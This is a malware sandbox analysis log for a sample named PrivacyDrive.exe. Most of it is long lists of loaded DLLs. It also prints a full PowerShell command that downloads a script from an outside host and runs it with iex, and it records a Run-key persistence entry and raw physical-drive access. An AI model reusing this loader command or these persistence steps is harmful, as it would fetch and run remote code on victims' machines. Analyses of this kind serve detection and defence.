    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
    Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr

    Data Obfuscation

    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $textJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_0050E640 LoadLibraryW,GetProcAddress,VirtualAlloc,  4_2_0050E640
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_0041E2B0 push ecx; mov dword ptr [esp], 42C00000h  4_2_0041E4B6
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_0041E2B0 push ecx; mov dword ptr [esp], 42C00000h  4_2_0041E4F0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_004CB540 push ecx; mov dword ptr [esp], 3F800000h  4_2_004CB572
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_0041E570 push ecx; mov dword ptr [esp], 3F800000h  4_2_0041E6F3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00448697 pushfd ; iretd  4_2_004486A2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_0041E7B0 push ecx; mov dword ptr [esp], 3F800000h  4_2_0041E99C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00426880 push ecx; mov dword ptr [esp], 3F800000h  4_2_004268B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_004CB9E0 push ecx; mov dword ptr [esp], 3F800000h  4_2_004CBA12
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_0041EA60 push ecx; mov dword ptr [esp], 3F800000h  4_2_0041EC2B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00419A00 push ecx; mov dword ptr [esp], 3F800000h  4_2_00419A34
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_004ECB30 push ecx; mov dword ptr [esp], 00000000h  4_2_004ECB42
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00486BD0 push ecx; mov dword ptr [esp], 3F800000h  4_2_00486C06
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00486BD0 push ecx; mov dword ptr [esp], 3F800000h  4_2_00486C2D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00502C4E push ecx; ret  4_2_00502C61
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00506C25 push ecx; ret  4_2_00506C38
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_0041BFA0 push ecx; mov dword ptr [esp], 3F800000h  4_2_0041BFEB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00FC2307 push ecx; retf  4_2_00FC2308
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_051E0905 push ecx; retf  4_2_051E0906
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 8_2_00FB2307 push ecx; retf  8_2_00FB2308
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 8_2_01210905 push ecx; retf  8_2_01210906

    Persistence and Installation Behavior

    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d  4_2_0045D070
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: RegCloseKey,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d  4_2_0045CD20
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: \KnownDlls32\BitsProxy.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

    Boot Survival

    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d  4_2_0045D070
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: RegCloseKey,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d  4_2_0045CD20
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_0041CDA0 QueryServiceStatus,CloseServiceHandle,Sleep,QueryServiceStatus,StartServiceW,GetLastError,Sleep,  4_2_0041CDA0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0Beb

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_004CDA40 SendMessageW,GetWindowRect,IsIconic,GetWindowRect,PostMessageW,IsZoomed,  4_2_004CDA40
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00489C60 IsWindowVisible,IsIconic,PostMessageW,IsIconic,  4_2_00489C60
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00489D10 IsWindowVisible,IsIconic,SendMessageW,IsIconic,SendMessageW,ShowWindow,IsWindow,IsWindow,IsWindow,IsWindow,PostMessageW,  4_2_00489D10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Code function: 4_2_00417E90 IsWindow,GetWindowRect,IsWindow,IsWindowVisible,IsIconic,GetWindowRect,SetWindowPos,  4_2_00417E90
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe  Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
